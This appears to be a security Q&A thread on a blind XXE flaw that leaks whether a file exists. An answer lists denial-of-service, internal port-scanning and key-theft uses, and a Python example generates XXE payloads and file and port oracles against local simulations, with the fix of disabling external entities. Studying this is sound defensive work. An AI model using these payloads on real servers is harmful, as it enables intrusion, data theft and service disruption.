
I had come across an XML request-response pair while testing a web application and attempted to inject XXE payloads. Note that in this case no XML parameter sent in the request was getting reflected in the response. However, as the request and response were in XML, I decided to try XXE payloads.

Though I was not able to include any local file from the server in the response, I received different HTTP responses for requests containing valid and invalid file names, e.g.

<!ENTITY file SYSTEM "file:///etc/hosts">    (valid file)
<!ENTITY file SYSTEM "file:///etc/hosts1">   (invalid file)

For each of the above cases different HTTP responses were received. The valid file name returned an XML response without any errors and the invalid file name returned an XML parsing error clearly stating - 'file not found'.

I am finished with my report for the activity and have reported this issue as "File name enumeration due to XML parsing errors". However I was curious about different ways in which this vulnerability can be exploited to obtain more information about the back end server and would like to receive any inputs to assess the technical impact of this vulnerability.

Shurmajee

1 Answer

Not a complete answer, but it's worth noting that XXE can often be a DoS bug as well as an information disclosure bug. Try reading from /dev/zero or \\.\pipe\atsvc or any other kind of special pipe/socket/file that either never ends or will simply block for approximately forever. Of course, if XXE works then you can usually also do recursive entity expansion (a.k.a. Billion Laughs), which is also a pretty easy DoS.

XXE can also be used to pivot a network scan behind the server's firewall. You don't have to specify a file: URI scheme; http:, https:, ftp:, and so on work too. You can also specify non-standard ports, which is helpful when looking for things like certain admin interfaces. This is, of course, more useful when you have access to the contents of those URLs, but just knowing the services are there is often helpful.

It's very odd that you weren't able to get the file contents. Usually that's possible in one way or another, be it via an error message or by specifying the file contents as user-supplied input and then reading them out using another function (as in, "why yes, my home address is the contents of your TLS private key!").

CBHacking
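The following is an added example, not code from the question or the answer above. It reproduces both oracles discussed on this page with Python's standard-library xml.sax/expat parser standing in for the unknown back-end parser: the simulated application never echoes an entity's value, yet a nonexistent file (the question's /etc/hosts vs /etc/hosts1 case) and a closed TCP port (the answer's http: pivot) still produce a different HTTP status than an existing file or an open port. The same parser with external general entities left disabled, which is the stdlib default, shows the hardened behaviour, where both probes parse identically and the oracle disappears. The function names, the temp files and the local listener are this example's own constructions; the error text differs from the 'file not found' message the question saw, but the status difference is the same.

```python
# Added example (not from the original post). xml.sax/expat stands in for the
# vulnerable back-end parser; all names and sample inputs are constructed here.
import io
import os
import socket
import tempfile
import threading
import xml.sax
from http.server import BaseHTTPRequestHandler, HTTPServer
from xml.sax.handler import ContentHandler, feature_external_ges


def xxe_payload(uri: str) -> str:
    """Probe document: declare one external entity and reference it once."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE probe [ <!ENTITY file SYSTEM "{uri}"> ]>\n'
        '<probe><name>&file;</name></probe>'
    )


def simulated_backend(xml_bytes: bytes, resolve_external: bool) -> dict:
    """Model of the server endpoint: returns a status only, never the parsed
    values. resolve_external=True is the vulnerable configuration; False is
    the stdlib default (external general entities are skipped) and the fix."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    parser.setContentHandler(ContentHandler())  # discard content: nothing is reflected
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except Exception as exc:  # SAXParseException, or a URLError/OSError raised while fetching
        return {"status": 500, "error": f"{type(exc).__name__}: {exc}"}
    return {"status": 200, "error": None}


def resource_reachable(uri: str, resolve_external: bool = True) -> bool:
    """The attacker's view of the oracle: True when the probe parsed cleanly."""
    return simulated_backend(xxe_payload(uri).encode(), resolve_external)["status"] == 200


def demo_file_oracle() -> dict:
    """The question's scenario (hosts vs hosts1) replayed against temp files."""
    with tempfile.TemporaryDirectory() as d:
        present, absent = os.path.join(d, "hosts"), os.path.join(d, "hosts1")
        with open(present, "w") as fh:
            fh.write("127.0.0.1 localhost\n")  # constructed sample content
        return {
            "vuln_present": resource_reachable(f"file://{present}", True),
            "vuln_absent": resource_reachable(f"file://{absent}", True),
            "fixed_present": resource_reachable(f"file://{present}", False),
            "fixed_absent": resource_reachable(f"file://{absent}", False),
        }


class _TinyHandler(BaseHTTPRequestHandler):
    """Stand-in for an internal service behind the server's firewall."""
    def do_GET(self):
        body = b"ok\n"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass


def demo_port_oracle() -> dict:
    """The answer's pivot: probe http://127.0.0.1:<port>/ for an open and a closed port."""
    srv = HTTPServer(("127.0.0.1", 0), _TinyHandler)
    open_port = srv.server_address[1]
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    with socket.socket() as s:  # take a free port and release it, so it is closed
        s.bind(("127.0.0.1", 0))
        closed_port = s.getsockname()[1]
    try:
        return {
            "open": resource_reachable(f"http://127.0.0.1:{open_port}/"),
            "closed": resource_reachable(f"http://127.0.0.1:{closed_port}/"),
        }
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(demo_file_oracle())
    print(demo_port_oracle())
```

With resolution enabled, the existing file and the open port return 200 while the missing file and the closed port return 500, even though no entity content is ever sent back; with resolution disabled, every probe returns 200 and nothing can be enumerated. The fix for the application in the question is therefore to turn off external entity resolution in whatever parser it uses, not to sanitise the error message.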